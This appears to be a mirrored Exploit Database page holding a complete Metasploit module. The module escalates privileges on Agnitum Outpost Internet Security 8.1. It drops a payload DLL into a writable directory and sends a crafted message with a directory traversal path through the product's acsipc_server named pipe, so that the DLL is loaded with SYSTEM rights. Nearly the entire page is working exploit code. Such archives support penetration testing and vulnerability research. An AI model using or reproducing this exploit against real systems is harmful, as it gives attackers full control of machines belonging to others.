Agnitum Outpost Internet Security – Local Privilege Escalation (Metasploit)

• Exploit Database
• 112 阅读

• 作者： Metasploit
  日期： 2013-09-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/28335/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##   require &apos;msf/core&apos; require &apos;rex&apos; require &apos;msf/core/post/common&apos; require &apos;msf/core/post/windows/priv&apos; require &apos;msf/core/post/windows/process&apos;   class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking   include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, { &apos;Name&apos; => &apos;Agnitum Outpost Internet Security Local Privilege Escalation&apos;, &apos;Description&apos;=> %q{ This module exploits a directory traversal vulnerability on Agnitum Outpost Internet Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load load arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions). }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Ahmad Moghimi&apos;, # Vulnerability discovery &apos;juan vazquez&apos; # MSF module ], &apos;Arch&apos; => ARCH_X86, &apos;Platform&apos; => &apos;win&apos;, &apos;SessionTypes&apos; => [ &apos;meterpreter&apos; ], &apos;Privileged&apos; => true, &apos;Targets&apos;=> [ [ &apos;Agnitum Outpost Internet Security 8.1&apos;, { } ], ], &apos;Payload&apos;=> { &apos;Space&apos; => 2048, &apos;DisableNops&apos; => true }, &apos;References&apos; => [ [ &apos;OSVDB&apos;, &apos;96208&apos; ], [ &apos;EDB&apos;, &apos;27282&apos; ], [ &apos;URL&apos;, &apos;http://mallocat.com/a-journey-to-antivirus-escalation/&apos; ] ], &apos;DisclosureDate&apos; => &apos;Aug 02 2013&apos;, &apos;DefaultTarget&apos;=> 0 }))   register_options([ # It is OptPath becuase it&apos;s a *remote* path OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]), # By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\ OptInt.new("DEPTH", [ true, "Traversal depth", 3 ]) ], self.class)     end   def junk return rand_text_alpha(4).unpack("V").first end   def open_named_pipe(pipe) invalid_handle_value = 0xFFFFFFFF   r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)   handle = r[&apos;return&apos;]   if handle == invalid_handle_value return nil end   return handle end   def write_named_pipe(handle, dll_path, dll_name)   traversal_path = "..\\" * datastore["DEPTH"] traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "") traversal_path << "\\#{dll_name}"   path = Rex::Text.to_unicode(traversal_path)   data = "\x00" * 0x11 data << path data << "\x00\x00" data << "\x00\x00\x00"   buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler buf << [0x17].pack("V") # command buf << [junk].pack("V") buf << [data.length].pack("V") buf << [0, 0, 0].pack("V*") buf << data   w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)   if w[&apos;return&apos;] == false print_error("The was an error writing to disk, check permissions") return nil end   return w[&apos;lpNumberOfBytesWritten&apos;] end     def check handle = open_named_pipe("\\\\.\\pipe\\acsipc_server") if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) return Exploit::CheckCode::Detected end   def exploit   temp_dir = ""   print_status("Opening named pipe...") handle = open_named_pipe("\\\\.\\pipe\\acsipc_server") if handle.nil? fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found") else print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...") end   if datastore["WritableDir"] and not datastore["WritableDir"].empty? temp_dir = datastore["WritableDir"] else temp_dir = expand_path("%TEMP%") end   print_status("Using #{temp_dir} to drop malicious DLL...") begin cd(temp_dir) rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Config, "Failed to use the #{temp_dir} directory") end   print_status("Writing malicious DLL to remote filesystem") write_path = pwd dll_name = "#{rand_text_alpha(10 + rand(10))}.dll" begin # Agnitum Outpost Internet Security doesn&apos;t complain when dropping the dll to filesystem write_file(dll_name, generate_payload_dll) register_file_for_cleanup("#{write_path}\\#{dll_name}") rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}") end   print_status("Exploiting through \\\\.\\pipe\\acsipc_server...") bytes = write_named_pipe(handle, write_path, dll_name) session.railgun.kernel32.CloseHandle(handle)   if bytes.nil? fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server") end   end   end